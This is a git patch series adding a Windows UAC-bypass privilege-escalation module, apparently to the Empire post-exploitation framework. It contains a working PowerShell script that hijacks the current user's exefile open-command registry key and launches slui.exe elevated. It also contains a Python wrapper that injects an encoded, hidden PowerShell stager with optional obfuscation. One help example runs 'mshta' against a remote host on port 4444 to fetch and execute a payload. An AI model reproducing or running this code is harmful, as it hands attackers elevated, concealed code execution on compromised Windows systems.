From 9e14b42983ceed629361409cf6e5cac49ee4c1fb Mon Sep 17 00:00:00 2001 From: ThePirateWhoSmellsOfSunflowers Date: Mon, 8 Oct 2018 15:02:23 +0200 Subject: [PATCH 1/3] Add UAC Bypass via SLUI --- .../privesc/Invoke-SluiBypass.ps1 | 64 ++++++++++ .../powershell/privesc/bypassuac_slui.py | 115 ++++++++++++++++++ 2 files changed, 179 insertions(+) create mode 100644 data/module_source/privesc/Invoke-SluiBypass.ps1 create mode 100644 lib/modules/powershell/privesc/bypassuac_slui.py diff --git a/data/module_source/privesc/Invoke-SluiBypass.ps1 b/data/module_source/privesc/Invoke-SluiBypass.ps1 new file mode 100644 index 000000000..f6601473d --- /dev/null +++ b/data/module_source/privesc/Invoke-SluiBypass.ps1 @@ -0,0 +1,64 @@ +<# +.SYNOPSIS + This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE +.NOTES + Function : SluiHijackBypass + File Name : SluiHijackBypass.ps1 + Author : Gushmazuko +.LINK + https://github.com/gushmazuko/tools/blob/master/SluiHijackBypass.ps1 + Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation +.EXAMPLE + Load "cmd.exe" (By Default used 'arch 64'): + Invoke-SluiBypass -command "cmd.exe" + + Load "mshta http://192.168.0.30:4444/0HUGN" + Invoke-SluiBypass -command "mshta http://192.168.0.30:4444/0HUGN" +#> + +function Invoke-SluiBypass(){ + Param ( + + [Parameter(Mandatory=$True)] + [String]$command + ) + + $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin + $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop + + if(($(whoami /groups) -like "*S-1-5-32-544*").length -eq 0) { + "[!] Current user not a local administrator!" + Throw ("Current user not a local administrator!") + } + if (($(whoami /groups) -like "*S-1-16-8192*").length -eq 0) { + "[!] Not in a medium integrity process!" + Throw ("Not in a medium integrity process!") + } + + else{ + + #Create registry structure + New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force + New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force + + # Check for the environment and execute the Bypass + + if ( [environment]::Is64BitOperatingSystem -eq "True" ) + { + # x64 shell in Windows x64 | x86 shell in Windows x86 + Start-Process "C:\Windows\System32\slui.exe" -Verb runas + } + else + { + # x86 shell in Windows x64 + C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas" + } + + #Remove registry structure + Start-Sleep 3 + Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force + + } +} + diff --git a/lib/modules/powershell/privesc/bypassuac_slui.py b/lib/modules/powershell/privesc/bypassuac_slui.py new file mode 100644 index 000000000..f1e752d2d --- /dev/null +++ b/lib/modules/powershell/privesc/bypassuac_slui.py @@ -0,0 +1,115 @@ +from lib.common import helpers + +class Module: + + def __init__(self, mainMenu, params=[]): + + self.info = { + 'Name': 'Invoke-SluiBypass', + + 'Author': ['@Gushmazuko', '@truneski', '@ThePirateWhoSmellsOfSunflowers (github)'], + + 'Description': ("This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under the Current User hive, and inserting a custom command that will get invoked when any binary (.exe) application is launched."), + + 'Background' : True, + + 'OutputExtension' : None, + + 'NeedsAdmin' : False, + + 'OpsecSafe' : False, + + 'Language' : 'powershell', + + 'MinLanguageVersion' : '2', + + 'Comments': [ + 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation', + 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1' + ] + } + + # any options needed by the module, settable during runtime + self.options = { + # format: + # value_name : {description, required, default_value} + 'Agent' : { + 'Description' : 'Agent to run module on.', + 'Required' : True, + 'Value' : '' + }, + 'Listener' : { + 'Description' : 'Listener to use.', + 'Required' : True, + 'Value' : '' + }, + 'UserAgent' : { + 'Description' : 'User-agent string to use for the staging request (default, none, or other).', + 'Required' : False, + 'Value' : 'default' + }, + 'Proxy' : { + 'Description' : 'Proxy to use for request (default, none, or other).', + 'Required' : False, + 'Value' : 'default' + }, + 'ProxyCreds' : { + 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', + 'Required' : False, + 'Value' : 'default' + } + } + + # save off a copy of the mainMenu object to access external functionality + # like listeners/agent handlers/etc. + self.mainMenu = mainMenu + + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + + def generate(self, obfuscate=False, obfuscationCommand=""): + + listenerName = self.options['Listener']['Value'] + + # staging options + userAgent = self.options['UserAgent']['Value'] + proxy = self.options['Proxy']['Value'] + proxyCreds = self.options['ProxyCreds']['Value'] + + # read in the common module source code + moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-SluiBypass.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") + try: + f = open(moduleSource, 'r') + except: + print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) + return "" + + moduleCode = f.read() + f.close() + + script = moduleCode + + if not self.mainMenu.listeners.is_listener_valid(listenerName): + # not a valid listener, return nothing for the script + print helpers.color("[!] Invalid listener: " + listenerName) + return "" + else: + # generate the PowerShell one-liner with all of the proper options set + launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) + encScript = launcher.split(" ")[-1] + if launcher == "": + print helpers.color("[!] Error in launcher generation.") + return "" + else: + scriptEnd = "Invoke-SluiBypass -command \"%s\"" % (encScript) + if obfuscate: + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd + return script From ebc631fd33540f94dd7982abd20cb02173838c52 Mon Sep 17 00:00:00 2001 From: ThePirateWhoSmellsOfSunflowers Date: Mon, 8 Oct 2018 21:21:45 +0200 Subject: [PATCH 2/3] add missing launcher --- lib/modules/powershell/privesc/bypassuac_slui.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/modules/powershell/privesc/bypassuac_slui.py b/lib/modules/powershell/privesc/bypassuac_slui.py index f1e752d2d..bde32b3b6 100644 --- a/lib/modules/powershell/privesc/bypassuac_slui.py +++ b/lib/modules/powershell/privesc/bypassuac_slui.py @@ -108,7 +108,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""): print helpers.color("[!] Error in launcher generation.") return "" else: - scriptEnd = "Invoke-SluiBypass -command \"%s\"" % (encScript) + scriptEnd = "Invoke-SluiBypass -command \"powershell -NoP -NonI -w Hidden -enc %s\"" % (encScript) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd From 047a930c4ee2c8d0558265cf7d85bcfa624993fd Mon Sep 17 00:00:00 2001 From: ThePirateWhoSmellsOfSunflowers Date: Mon, 8 Oct 2018 21:49:45 +0200 Subject: [PATCH 3/3] Add original author --- lib/modules/powershell/privesc/bypassuac_slui.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/modules/powershell/privesc/bypassuac_slui.py b/lib/modules/powershell/privesc/bypassuac_slui.py index bde32b3b6..00bd54e9a 100644 --- a/lib/modules/powershell/privesc/bypassuac_slui.py +++ b/lib/modules/powershell/privesc/bypassuac_slui.py @@ -7,7 +7,7 @@ def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'Invoke-SluiBypass', - 'Author': ['@Gushmazuko', '@truneski', '@ThePirateWhoSmellsOfSunflowers (github)'], + 'Author': ['@bytecode77','@Gushmazuko', '@truneski', '@ThePirateWhoSmellsOfSunflowers (github)'], 'Description': ("This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under the Current User hive, and inserting a custom command that will get invoked when any binary (.exe) application is launched."),